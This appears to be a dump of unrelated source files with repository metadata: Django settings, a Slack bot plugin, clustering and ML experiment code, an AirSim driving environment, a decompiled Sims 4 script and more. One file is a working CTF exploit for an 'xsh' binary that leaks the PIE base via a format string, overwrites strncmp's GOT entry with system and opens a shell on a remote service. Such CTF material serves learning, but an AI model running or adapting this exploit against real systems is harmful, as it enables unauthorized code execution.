]
WSGI_APPLICATION = 'lab5.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"n10florin@gmail.com"
] | n10florin@gmail.com |
172e416bfd9fae185c8298b4930fcd1fbb386ef6 | 8625b3616fa4a8aaf836c26e344bb39552a13c7b | /plugins/reactionCounterPlugin.py | 475ba07ec02c9f2bc78e4c15fc71888a5890a772 | [
"MIT"
] | permissive | Avishek-Paul/SlackAssistant | 06fa2049676206833aa661487d10518c03ea9466 | 4cb41fe62526dc26381c6ca6bc420b1104a8da2f | refs/heads/master | 2023-01-08T08:41:43.910145 | 2020-11-11T01:10:05 | 2020-11-11T01:10:05 | 311,824,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,564 | py | import config
from slackclient import SlackClient
class reactionCounterPlugin:
    def __init__(self):
        # Trigger words this plugin reacts to, plus the internal
        # 'reactionBased' routing keyword.
        self.keywords = ['!rankings', '!Rankings', '!ranking', '!Ranking', 'reactionBased']
        self.client = SlackClient(config.bot_token)
        self.db = config.mongoClient  # Mongo collection of per-user react counters
    def execute(self, event):
        """Handle one Slack event: post giver/receiver ranking tables for
        '!rankings [N]' messages, and keep per-user counters in sync on
        reaction add/remove."""
        if event['type'] == 'message':
            message = event.get("text", "")
            if len(message.split()) > 1:
                # '!rankings N' - build top-N tables for givers and receivers.
                num = int(message.split()[1])
                maxGiversRaw = self.db.find(sort=[('given', -1)])
                maxReceiversRaw = self.db.find(sort=[('received', -1)])
                mGBase = "The #{} reactor is <@{}> with {} reacts given.\n"
                mRBase = "The #{} reacted is <@{}> with {} reacts received.\n"
                m1 = ""
                m2 = ""
                for i in range(num):
                    try:
                        gItem = maxGiversRaw[i]
                        rItem = maxReceiversRaw[i]
                        m1 += mGBase.format(i+1, gItem['user_id'], gItem['given'])
                        m2 += mRBase.format(i+1, rItem['user_id'], rItem['received'])
                    # NOTE(review): bare except - presumably stops when the
                    # collection has fewer than N users; a narrower
                    # IndexError/StopIteration would be safer.
                    except:
                        break
            else:
                # Bare '!rankings' - show only the single top giver/receiver.
                maxGiverRaw = self.db.find_one(sort=[('given', -1)])
                maxReceiverRaw = self.db.find_one(sort=[('received', -1)])
                m1 = "The #1 reactor is <@{}> with {} reacts given.\n".format(maxGiverRaw['user_id'], maxGiverRaw['given'])
                m2 = "The #1 reacted is <@{}> with {} reacts received.\n".format(maxReceiverRaw['user_id'], maxReceiverRaw['received'])
            # Post both tables as code blocks in the triggering thread.
            self.client.api_call("chat.postMessage", thread_ts=event['ts'], channel=event['channel'], text="```{}```".format(m1))
            self.client.api_call("chat.postMessage", thread_ts=event['ts'], channel=event['channel'], text="```{}```".format(m2))
        elif event['type'] == 'reaction_added': #or event['type'] == 'reaction_removed':
            self.updateCounter(event, 1)
        elif event['type'] == 'reaction_removed':
            self.updateCounter(event, -1)
def updateCounter(self, event, val):
reaction = event['reaction']
channel = event['item']['channel']
reactor = event['user'] #react giver
reacted = event['item_user'] #react receiver
if reactor == reacted:
return
reactorRaw = self.client.api_call("users.info", user=reactor)
reactedRaw = self.client.api_call("users.info", user=reacted)
reactorReal = reactorRaw['user']['real_name']
reactorDisplay = reactorRaw['user']['profile']['display_name']
reactedReal = reactedRaw['user']['real_name']
reactedDisplay = reactedRaw['user']['profile']['display_name']
#increment the reactor
self.db.update_one({'user_id' : reactor},
{
'$set' : {'display' : reactorDisplay, 'real': reactorReal},
'$inc' : {'given' : val}
},
upsert=True)
#increments the reacted
self.db.update_one({'user_id' : reacted},
{
'$set' : {'display' : reactedDisplay, 'real': reactedReal},
'$inc' : {'received' : val}
},
upsert=True) | [
"avishek97paul@gmail.com"
] | avishek97paul@gmail.com |
8d00b1ee6bc068f204efbd23dc93e6b7be30deb3 | 36c170d204310f4e5985bd5c024a286acae36aba | /Labs/seminar/functii.py | 930df547edf5d8709c42ecbf513a6d063922f248 | [] | no_license | petrediana/Analiza-Datelor | 7cc6d1f31f6d7407e702d2cc29b9baa7ca1cda8c | 23d2282a0a662fe778aae5ec9d90e32c353bdec0 | refs/heads/master | 2020-08-04T05:52:36.700366 | 2019-12-10T08:20:54 | 2019-12-10T08:20:54 | 212,029,364 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | import numpy as np
import pandas as pd
# trimit matricea ierarhie si cate clase vreau sa trimit
def partitie(h, k):
n = np.shape(h)[0] + 1 # numarul de instante
c = np.arange(n) # primii n clusteri
for i in range(n - k):
k1 = h[i, 0]
k2 = h[i, 1]
# se formeaza cluster n + i si trebuie sa includa toate instantele care erau in k1 si k2
c[c==k1] = n + i
c[c==k2] = n + i
#print(c)
c_transformat_categorie = pd.Categorical(c).codes # imi trasforma, imi intoarce in c_trans variabila categoriala cu cele k categorii
return ["c" + str(i + 1) for i in c_transformat_categorie] | [
"noreply@github.com"
] | petrediana.noreply@github.com |
b341b840a33dfd2e49d09afbc302f4239a84611c | b983d66bb053966d46b7ff0cc7bea4142d8fe852 | /src/states.py | ca19928ba363470c4fd331d5e211ff3a03e33dbe | [
"MIT"
] | permissive | povle/vk-engineers | d4104c39c1846bc5b4250702b0da486bc8e01645 | bff0c3ac244dffc79baeed423db5a5dc814f04b8 | refs/heads/master | 2023-07-28T06:52:36.184954 | 2021-09-07T21:15:44 | 2021-09-07T21:15:44 | 305,855,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | class StateError(Exception):
pass
# Conversation-state identifiers for the bot's finite-state machine.
# Regular-user states:
USER_NEW = 'user_new'
USER_INIT = 'user_init'
USER_DEFAULT = 'user_default'
# Admin states:
ADMIN_DEFAULT = 'admin_default'
ADMIN_BROADCAST_GROUP_SELECTION = 'admin_broadcast_group_selection'
ADMIN_MESSAGE_INPUT = 'admin_message_input'
ADMIN_RECEIVER_GROUP_SELECTION = 'admin_receiver_group_selection'
ADMIN_RECEIVER_SELECTION = 'admin_receiver_selection'
ADMIN_UNREAD_GROUP_SELECTION = 'admin_unread_group_selection'
| [
"pasha@blinov.co"
] | pasha@blinov.co |
55c13d8cf177119f3b0b4ac0b18bc121cc4f8d62 | f64e31cb76909a6f7fb592ad623e0a94deec25ae | /tests/test_p1494_parallel_courses_ii.py | dbf8cbae087e98cebaed176c651d916aaa595833 | [] | no_license | weak-head/leetcode | 365d635cb985e1d154985188f6728c18cab1f877 | 9a20e1835652f5e6c33ef5c238f622e81f84ca26 | refs/heads/main | 2023-05-11T14:19:58.205709 | 2023-05-05T20:57:13 | 2023-05-05T20:57:13 | 172,853,059 | 0 | 1 | null | 2022-12-09T05:22:32 | 2019-02-27T05:58:54 | Python | UTF-8 | Python | false | false | 1,391 | py | # flake8: noqa: F403, F405
import pytest
from leetcode.p1494_parallel_courses_ii import *
solutions = [
minNumberOfSemesters,
]
test_cases = [
(
[
13,
[
[12, 8],
[2, 4],
[3, 7],
[6, 8],
[11, 8],
[9, 4],
[9, 7],
[12, 4],
[11, 4],
[6, 4],
[1, 4],
[10, 7],
[10, 4],
[1, 7],
[1, 8],
[2, 7],
[8, 4],
[10, 8],
[12, 7],
[5, 4],
[3, 4],
[11, 7],
[7, 4],
[13, 4],
[9, 8],
[13, 8],
],
9,
],
3,
),
([4, [[2, 1], [3, 1], [1, 4]], 2], 3),
([5, [[2, 1], [3, 1], [4, 1], [1, 5]], 2], 4),
([11, [], 2], 6),
([11, [], 1], 11),
([11, [], 3], 4),
([11, [], 6], 2),
([11, [], 8], 2),
([11, [], 10], 2),
([11, [], 11], 1),
([11, [], 12], 1),
]
@pytest.mark.timeout(2)
@pytest.mark.parametrize(("args", "expectation"), test_cases)
@pytest.mark.parametrize("solution", solutions)
def test_solution(args, expectation, solution):
    # Run every registered solution against every (input, expected) pair.
    assert solution(*args) == expectation
| [
"zinchenko@live.com"
] | zinchenko@live.com |
468a03cc09e3982d357c914a5bd468274a433c55 | d5466ac9513c4cf9addb01fd89b4220696352054 | /DRL/envs/airsim/airsimcarenv.py | eea010e1a42e301f1c07418e08f5c8fc8e98aa45 | [] | no_license | sanketh1691/Don-t-Crash | 99f6bb61f53751d227b31d84bd593945dde04e12 | 9edd845b750d450de0c21543c3a82d19a8571cbc | refs/heads/master | 2023-01-18T21:06:23.052387 | 2020-11-24T03:26:03 | 2020-11-24T03:26:03 | 315,507,066 | 1 | 0 | null | 2020-11-24T03:23:39 | 2020-11-24T03:23:38 | null | UTF-8 | Python | false | false | 4,790 | py | import logging
import math
import numpy as np
import random
import time
import gym
from gym import spaces
from gym.utils import seeding
from gym.spaces import Tuple, Box, Discrete, MultiDiscrete, Dict
from gym.spaces.box import Box
from envs.airsim.myAirSimCarClient import *
logger = logging.getLogger(__name__)
class AirSimCarEnv(gym.Env):
airsimClient = None
    def __init__(self):
        """Set up the gym spaces, episode bookkeeping and the AirSim client."""
        # left depth, center depth, right depth, steering
        self.low = np.array([0.0, 0.0, 0.0, 0])
        self.high = np.array([100.0, 100.0, 100.0, 21])
        self.observation_space = spaces.Box(self.low, self.high)
        # 21 discrete steering actions, mapped to [-2.0, 2.0] in _step.
        self.action_space = spaces.Discrete(21)
        self.state = (100, 100, 100, random.uniform(-1.0, 1.0))
        self.episodeN = 0
        self.stepN = 0
        self.allLogs = { 'speed':[0] }
        self._seed()
        self.stallCount = 0
        # Single shared client for the whole process.
        global airsimClient
        airsimClient = myAirSimCarClient()
    def _seed(self, seed=None):
        # Standard gym seeding hook; stores the RNG and returns the seed used.
        self.np_random, seed = seeding.np_random(seed)
        return [seed]
    def computeReward(self, mode='roam'):
        """Return [reward, dSpeed] for the current step.

        'roam' rewards speed, penalizes sharp steering at speed and sudden
        speed drops (collision proxy). 'smooth' additionally penalizes jerky
        steering changes. Any other mode returns a flat reward of 1.
        """
        speed = self.car_state.speed
        steer = self.steer
        dSpeed = 0
        if mode == 'roam' or mode == 'smooth':
            # reward for speed
            reward = speed/60
            # penalize sharp steering, to discourage going in a circle
            if abs(steer) >= 1.0 and speed > 100:
                reward -= abs(steer) * 2
            # penalize collision
            # NOTE(review): indexes [-2], so this raises IndexError when the
            # speed log has exactly one entry despite the len > 0 guard -
            # confirm the log always has >= 2 entries by the first call.
            if len(self.allLogs['speed']) > 0:
                dSpeed = speed - self.allLogs['speed'][-2]
            else:
                dSpeed = 0
            reward += dSpeed
            # penalize for going in a loop forever
            #reward -= abs(self.steerAverage) * 10
        else:
            reward = 1
            # Placehoder. To be filled
        if mode == 'smooth':
            # also penalize on jerky motion, based on a fake G-sensor
            steerLog = self.allLogs['steer']
            g = abs(steerLog[-1] - steerLog[-2]) * 5
            reward -= g
        return [reward, dSpeed]
    def _step(self, action):
        """Apply one discrete steering action and return (state, reward, done, info).

        The episode ends after 3 consecutive near-stalled steps or when the
        cumulative reward drops below -1000.
        """
        assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action))
        self.stepN += 1
        # Map discrete action 0..20 to a steering value in [-2.0, 2.0].
        steer = (action - 10)/5.0
        time.sleep(0.1)
        car_state = airsimClient.getCarState()
        speed = car_state.speed
        self.car_state = car_state
        self.steer = steer
        #gas = 0.45555
        # Throttle tapers off as speed approaches 20.
        # NOTE(review): 'gas = gas =' duplicates the assignment; harmless but
        # likely a typo.
        gas = gas = max(min(20,(speed-20)/-15),0)
        airsimClient.setCarControls(gas, steer)
        speed = car_state.speed
        # Count consecutive near-stalled steps; 3 in a row ends the episode.
        if speed < 0.5:
            self.stallCount += 1
        else:
            self.stallCount = 0
        if self.stallCount > 2:
            done = True
        else:
            done = False
        # Observation: [left depth, center depth, right depth, action].
        self.sensors = airsimClient.getSensorStates()
        cdepth = self.sensors[1]  # NOTE(review): unused
        self.state = self.sensors
        self.state.append(action)
        self.addToLog('speed', speed)
        self.addToLog('steer', steer)
        steerLookback = 17
        steerAverage = np.average(self.allLogs['steer'][-steerLookback:])
        self.steerAverage = steerAverage
        # Training using the Roaming mode
        reward, dSpeed = self.computeReward('roam')
        self.addToLog('reward', reward)
        rewardSum = np.sum(self.allLogs['reward'])
        # Terminate the episode on large cumulative amount penalties,
        # since car probably got into an unexpected loop of some sort
        if rewardSum < -1000:
            done = True
        sys.stdout.write("\r\x1b[K{}/{}==>reward/depth/steer/speed: {:.0f}/{:.0f} \t({:.1f}/{:.1f}/{:.1f}) \t{:.1f}/{:.1f} \t{:.2f}/{:.2f} ".format(self.episodeN, self.stepN, reward, rewardSum, self.state[0], self.state[1], self.state[2], steer, steerAverage, speed, dSpeed))
        sys.stdout.flush()
        # placeholder for additional logic
        if done:
            pass
        return np.array(self.state), reward, done, {}
def addToLog (self, key, value):
if key not in self.allLogs:
self.allLogs[key] = []
self.allLogs[key].append(value)
    def _reset(self):
        """Reset the simulator and episode bookkeeping; return the initial state."""
        airsimClient.reset()
        airsimClient.setCarControls(1, 0)
        # Give the car a moment to start moving before the first step.
        time.sleep(0.8)
        self.stepN = 0
        self.stallCount = 0
        self.episodeN += 1
        print("")
        self.allLogs = { 'speed': [0] }
        # Randomize the initial steering to broaden learning
        self.state = (100, 100, 100, random.uniform(0.0, 21.0))
        return np.array(self.state)
"jaiminpa@usc.edu"
] | jaiminpa@usc.edu |
e19eeb31f0acad784dc3dad13eaa2bef568c94a5 | ed72d3f672d3298e9a2a4e9ff31915f9275bbf46 | /flight.py | a1043999b4044de661e6b6935f51b0bc6b746643 | [] | no_license | KirtMorgan/model_airport | 93810ceffce89ab670be7e10d1e0d44b7505e04e | e640a78e6afccb10f5f15646c696afd22027756a | refs/heads/master | 2020-05-17T00:03:51.525043 | 2019-04-29T14:30:19 | 2019-04-29T14:30:19 | 183,386,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,177 | py | from passenger import *
from plane import *
class Flight:
def __init__(self, origin_destination='', plane=''):
self.origin_destination = origin_destination
self.plane = plane
self.passengers_list = []
def add_plane(self, plane):
self.plane = plane
def add_origin_destination(self, origin_destination):
self.origin_destination = origin_destination
def add_passenger(self, passenger):
self.passengers_list.append(passenger)
# Airlines
airline_1 = Flight('UK - New Vegas', Boeing_747_8.owner)
airline_2 = Flight('Turkey - Paris', Boeing_747_400.owner)
airline_3 = Flight('New York - UK', Boeing_747_400ER.owner)
airline_4 = Flight('Spain - Portugal', Boeing_777_300.owner)
airline_5 = Flight('France - Germany', Boeing_777_300ER.owner)
list_flights = []
list_flights.append(airline_1)
list_flights.append(airline_2)
list_flights.append(airline_3)
list_flights.append(airline_4)
list_flights.append(airline_5)
list_passengers = []
list_passengers.append(passenger_1)
list_passengers.append(passenger_2)
list_passengers.append(passenger_3)
list_passengers.append(passenger_4)
list_passengers.append(passenger_5) | [
"kirtmorgan@live.com"
] | kirtmorgan@live.com |
78e368fb716111fadb4e8ba88e1ddd8e34f363a5 | 98b0d740346ad9aecd228b9a8ebb8e818908ce03 | /hr-1.py | 0d51517045973153f9d6f31c16975b8fb25a1e6b | [] | no_license | alexisbellido/python-examples | 8c63156a2800a584a8aff0909325e38acbe49163 | e6a4f61d9cd18588987430007e28ef036971764b | refs/heads/master | 2022-10-16T08:28:15.312916 | 2022-09-30T15:55:31 | 2022-09-30T15:55:31 | 240,379,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | def hi(name):
return f'Hi, {name}'
if __name__ == '__main__':
# people = [input().split() for i in range(int(input()))]
# print(*name_format(people), sep='\n')
####################
people = [
'John',
'Mike',
]
# print(hi(people[0]))
# print(hi(people[1]))
# print(*hi(people), sep='\n')
| [
"alexis@ventanazul.com"
] | alexis@ventanazul.com |
9e783b4e701f26b5c214da0138af22e4c3c66562 | f2ac9260dfa7483cd54a30700bb952e10acbc1bb | /fit_lr.py | 27c2ea1089ad19bf4212c6e4d9de0bab81cb012f | [] | no_license | kudkudak/compound-activity-prediction | 94dd9efd2ff7ba5c95ebb71ce1766eb6b8882aac | d55e6ecb4e3de74d40b1a37950449f60df1a2ca4 | refs/heads/master | 2016-09-15T21:35:54.930142 | 2015-01-14T13:09:19 | 2015-01-14T13:09:19 | 27,130,096 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,056 | py | from misc.utils import *
from misc.experiment_utils import get_exp_options, print_exp_header, \
save_exp, get_exp_logger, generate_configs, print_exp_name
from data_api import prepare_experiment_data, prepare_experiment_data_embedded, get_raw_training_data
from sklearn.metrics import matthews_corrcoef, accuracy_score, confusion_matrix
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import MinMaxScaler
import sklearn.linear_model
def fit_lrs(config_in=None):
    """Cross-validated logistic-regression grid search over the C parameter.

    Loads the embedded experiment data for the configured protein/fingerprint,
    fits one LogisticRegression per C value across the CV folds, records
    per-fold accuracy/MCC/WAC, saves the experiment and reports the best
    configuration by mean weighted accuracy.

    config_in: optional dict of config overrides; when None the options are
    taken from the command line via get_exp_options.
    """
    #### Load config and data ####
    config = {"protein": 0, "fingerprint": 4, "n_folds": 10,
              "use_embedding": 1, "K": 20, "max_hashes": 1000, "seed": 0, "C_min": -3, "C_max": 7}
    if config_in is None:
        config.update(get_exp_options(config))
    else:
        config.update(config_in)

    D, config_from_data = prepare_experiment_data_embedded(n_folds=10, seed=config["seed"], K=config["K"],
                                                          max_hashes=config["max_hashes"],
                                                          protein=config["protein"], fingerprint=config["fingerprint"])
    config.update(config_from_data)
    # C grid: 10^C_min .. 10^C_max in half-decade steps.
    config["C"] = [10.0**(i/float(2)) for i in range(2*config["C_min"], 2*(1+config["C_max"]))]
    print(config["C"])
    logger = get_exp_logger(config)

    ### Prepare experiment ###
    E = {"config": config, "experiments": []}

    def fit_lr(config):
        """Fit and evaluate one LogisticRegression (single C) over all folds."""
        ### Prepare result holders ###
        values = {}
        results = {}
        monitors = {}
        E = {"config": config, "results": results, "monitors": monitors, "values": values}

        ### Print experiment header ###
        print_exp_name(config)

        ### Train ###
        monitors["acc_fold"] = []
        monitors["mcc_fold"] = []
        monitors["wac_fold"] = []
        monitors["cm"] = []  # confusion matrix per fold
        monitors["clf"] = []
        monitors["train_time"] = []
        monitors["test_time"] = []
        results["mean_acc"] = 0
        results["mean_mcc"] = 0
        values["transformers"] = []

        for fold in D["folds"]:
            X_train, Y_train, X_test, Y_test = fold["X_train"], fold["Y_train"], fold["X_test"], fold["Y_test"]
            # Scale features to [0, 1]; fit on the training fold only.
            min_max_scaler = MinMaxScaler()
            X_train = min_max_scaler.fit_transform(X_train)
            X_test = min_max_scaler.transform(X_test)

            clf = sklearn.linear_model.LogisticRegression(C=config["C"], class_weight="auto")
            # BUGFIX: train_time was previously appended *before* clf.fit ran,
            # so it always recorded ~0 seconds; time the fit itself instead.
            tstart = time.time()
            clf.fit(X_train.astype(float), Y_train.astype(float).reshape(-1))
            monitors["train_time"].append(time.time() - tstart)

            tstart = time.time()
            Y_pred = clf.predict(X_test.astype(float))
            monitors["test_time"].append(time.time() - tstart)

            acc_fold, mcc_fold = accuracy_score(Y_test, Y_pred), matthews_corrcoef(Y_test, Y_pred)
            cm = confusion_matrix(Y_test, Y_pred)
            tp, fn, fp, tn = cm[1, 1], cm[1, 0], cm[0, 1], cm[0, 0]
            monitors["clf"].append(clf)
            monitors["cm"].append(cm)
            # Weighted accuracy: mean of sensitivity and specificity.
            monitors["wac_fold"].append(0.5*tp/float(tp+fn) + 0.5*tn/float(tn+fp))
            monitors["acc_fold"].append(acc_fold)
            monitors["mcc_fold"].append(mcc_fold)

        monitors["acc_fold"] = np.array(monitors["acc_fold"])
        monitors["mcc_fold"] = np.array(monitors["mcc_fold"])
        monitors["wac_fold"] = np.array(monitors["wac_fold"])
        results["mean_acc"] = monitors["acc_fold"].mean()
        results["mean_mcc"] = monitors["mcc_fold"].mean()
        results["mean_wac"] = monitors["wac_fold"].mean()
        logger.info(results)
        return E

    # One sub-experiment per C value.
    cv_configs = generate_configs(config, ["C"])
    for c in cv_configs:
        print(c)
        E["experiments"].append(fit_lr(c))

    save_exp(E)

    # Pick the configuration with the best mean weighted accuracy.
    best_e = E["experiments"][0]
    for e in E["experiments"]:
        if e["results"]["mean_wac"] > best_e["results"]["mean_wac"]:
            best_e = e
    logger.info(best_e)
    logger.info("Done")
if __name__ == "__main__":
fit_lrs()
| [
"staszek.jastrzebski@gmail.com"
] | staszek.jastrzebski@gmail.com |
b1671f8ccb003ceab564735e721f938521ca0ce4 | 66edf859b44d1e020bf61f5c1ca3a1d2c0952e2e | /rooters-2019/xsh/exploit.py | 0fc6fbe4ebce1c3def064de17762d48b54086f86 | [] | no_license | farazsth98/CTF | 5f40fe745ad2c6f4697c203532517dc93c88cc08 | d2de238538c112ce1ac3aab939460c03b3f0f732 | refs/heads/master | 2023-04-13T20:29:09.611005 | 2021-04-24T17:53:05 | 2021-04-24T17:53:05 | 216,312,857 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,225 | py | #!/usr/bin/env python2
from pwn import *
elf = ELF('./xsh')
libc = ELF('./libc.so.6')
def start():
    # Launch the target locally, or connect to the remote service.
    if not args.REMOTE:
        return process('./xsh')
        # NOTE(review): unreachable - placed after the return, so the local
        # libc is never (re)assigned here; the module-level libc is used.
        libc = ELF('./libc.so.6')
    else:
        return remote('35.192.206.226', 5555)
        # NOTE(review): unreachable - the remote libc is never loaded; the
        # exploit keeps using the local './libc.so.6' offsets. Probably meant
        # to assign `global libc` *before* returning - confirm offsets.
        libc = ELF('./libc-remote.so.6')
def execute(cmd):
    # Drain pending output, send one command to the target shell, and return
    # everything up to the next '$' prompt.
    p.recv()
    p.sendline(cmd)
    return p.recvuntil('$')
context.terminal = ['tmux', 'new-window']
p = start()
if args.GDB:
gdb.attach(p)
# Get base address of binary
leak = execute('echo 0x%3$x')[:10]
elf.address = int(leak, 16) - 0x1249
strncmp_got = elf.got['strncmp']
system = elf.plt['system']
log.info('PIE base: ' + hex(elf.address))
log.info('strncmp_got: ' + hex(strncmp_got))
log.info('system: ' + hex(system))
# Prepare to write system to strncmp_got
# Calculate each half of the address
# This is to prevent the exploit from taking way too long to write a huge address
first = int('0x' + hex(system)[-4:], 16)
second = int(hex(system)[:6], 16)
# Do the format string overwrite
payload = 'echo' + p32(strncmp_got) + p32(strncmp_got+2)
payload += '%{}c%24$n%{}c%25$n'.format(first-4-3, second-first)
execute(payload)
# Execute /bin/sh for shell
p.recv()
p.sendline('/bin/sh')
p.interactive()
| [
"faraz.abrar9@gmail.com"
] | faraz.abrar9@gmail.com |
97e53dbcc10f19ff3e71ee359e01ac2874a34773 | 0bdcbad65988ffa36a20e46228e39a55c5af3c47 | /src/get_files_not_in.py | b6c62ef31ce35ecaa9667b9b879ab6fc4b123093 | [
"MIT"
] | permissive | mpaloni/pioneer | abdc2d38eb79759aa2d9d5df6cc63c823ba74101 | c49efa2e071307b2534ca2abe7560f57683d2d9e | refs/heads/master | 2020-04-19T02:46:43.360350 | 2019-01-28T07:07:40 | 2019-01-28T07:07:40 | 167,914,384 | 0 | 0 | MIT | 2019-01-28T07:00:52 | 2019-01-28T07:00:51 | null | UTF-8 | Python | false | false | 1,637 | py |
import os
import argparse
import csv
import shutil
def main():
print("Started")
#define parameters
# parser = argparse.ArgumentParser(description='PIONEER Zeta')
# parser.add_argument('--first', type=str, help='Subject on the left side of the operator')
# parser.add_argument('--second', type=str, help='Subject on the right side of the operator')
# parser.add_argument('--third', type=str, default=None, help='Subject to apply the difference')
# parser.add_argument('--operator', type=str, help='Operator: minus or plus or both or avg')
# parser.add_argument('--source', type=str, default=None, help='Source directory')
# parser.add_argument('--target', type=str, default=None, help='Target directory')
# parser.add_argument('--intensify', type=str, default=None, help='Intensify the effect')
# parser.add_argument('--avg_keyword', type=str, default=None, help='Keyword to count the avg with. All and only files of interest should have this word in their name')
# args=parser.parse_args()
csv_path=os.path.expanduser("~/dippa/glasses.csv")
source=os.path.expanduser("~/dippa/img_align_celeba")
target=os.path.expanduser("~/dippa/celeba_noglasses/img")
src_files = os.listdir(source)
glasses=[]
with open(csv_path, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
glasses.append(', '.join(row).replace('"', ''))
src_files = os.listdir(source)
for file_name in src_files:
full_file_name = os.path.join(source, file_name)
if (file_name not in glasses):
print("Shifting "+file_name+" to "+target)
shutil.copy(full_file_name, target)
main()
| [
"noreply@github.com"
] | mpaloni.noreply@github.com |
4fafdb60d2714fc699c55d2ce9bc473bfcffb686 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /Scripts/simulation/situations/complex/university_mixer_situation.py | bdd94a7c82a8c319385d8ae99bf8517a96e6a57b | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,087 | py | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\situations\complex\university_mixer_situation.py
# Compiled at: 2019-10-19 01:32:53
# Size of source mod 2**32: 5699 bytes
from situations.situation_complex import SituationComplex, CommonInteractionCompletedSituationState, CommonSituationState, SituationComplexCommon, TunableSituationJobAndRoleState, SituationStateData
from sims4.tuning.tunable import TunableReference, TunableEnumWithFilter
from tag import Tag
import services
from objects.object_manager import ObjectManager
from sims4.tuning.instances import lock_instance_tunables
from situations.bouncer.bouncer_request import exclusivity_compare
from situations.bouncer.bouncer_types import BouncerExclusivityCategory
from situations.situation_types import SituationCreationUIOption
from situations.situation import Situation
class _MixerParty(CommonSituationState):
def timer_expired(self):
self._change_state(self.owner.cleanup_party_state())
def on_activate(self, reader=None):
super().on_activate(reader)
if self.owner.juice_keg is not None:
self.owner._claim_object(self.owner.juice_keg.id)
class _CleanupJuiceKeg(CommonInteractionCompletedSituationState):
def on_activate(self, reader=None):
super().on_activate(reader)
if self.owner.juice_keg is None:
self.owner._self_destruct()
def _on_interaction_of_interest_complete(self, **kwargs):
self.owner._self_destruct()
class _SetupJuiceKeg(CommonInteractionCompletedSituationState):
def _on_interaction_of_interest_complete(self, **kwargs):
self._change_state(self.owner.mixer_party_state())
class UniversityMixerPartySituation(SituationComplexCommon):
INSTANCE_TUNABLES = {'juice_keg_bearer_job_and_role':TunableSituationJobAndRoleState(description='\n The job and role state for the bearer of the juice keg.\n '),
'setup_juice_keg_state':_SetupJuiceKeg.TunableFactory(description='\n The state to bring in the keg bearer and have the juice keg set up on the lot.\n ',
display_name='1. Setup Juice Keg State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'mixer_party_state':_MixerParty.TunableFactory(description='\n The state to represent the party itself.\n ',
display_name='2. Mixer Party State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'cleanup_party_state':_CleanupJuiceKeg.TunableFactory(description='\n The state to cleanup the juice keg and end the party\n ',
display_name='3. Party Cleanup State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'juice_keg_tag':TunableEnumWithFilter(description='\n Tag used to find the juice keg supplied by the situation.\n ',
tunable_type=Tag,
default=Tag.INVALID,
invalid_enums=Tag.INVALID,
filter_prefixes=('func', ))}
REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES
def __init__(self, *args, **kwargs):
(super().__init__)(*args, **kwargs)
self._juice_keg_object_id = None
def start_situation(self):
super().start_situation()
if self.juice_keg is not None:
self._claim_object(self.juice_keg.id)
self._change_state(self.setup_juice_keg_state())
@classmethod
def _states(cls):
return (SituationStateData(1, _SetupJuiceKeg, factory=(cls.setup_juice_keg_state)),
SituationStateData(2, _MixerParty, factory=(cls.mixer_party_state)),
SituationStateData(3, _CleanupJuiceKeg, factory=(cls.cleanup_party_state)))
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
return [(cls.juice_keg_bearer_job_and_role.job, cls.juice_keg_bearer_job_and_role.role_state)]
@classmethod
def default_job(cls):
pass
@property
def juice_keg(self):
object_manager = services.object_manager()
juice_keg = None
if self._juice_keg_object_id is not None:
juice_keg = object_manager.get(self._juice_keg_object_id)
if juice_keg is None:
if self.juice_keg_bearer is not None:
for obj in object_manager.get_objects_with_tag_gen(self.juice_keg_tag):
if obj.get_sim_owner_id() is self.juice_keg_bearer.id:
juice_keg = obj
self._juice_keg_object_id = juice_keg.id
break
return juice_keg
@property
def juice_keg_bearer(self):
sim = next(self.all_sims_in_job_gen(self.juice_keg_bearer_job_and_role.job), None)
return sim
lock_instance_tunables(UniversityMixerPartySituation, exclusivity=(BouncerExclusivityCategory.NORMAL),
creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE)) | [
"cristina.caballero2406@gmail.com"
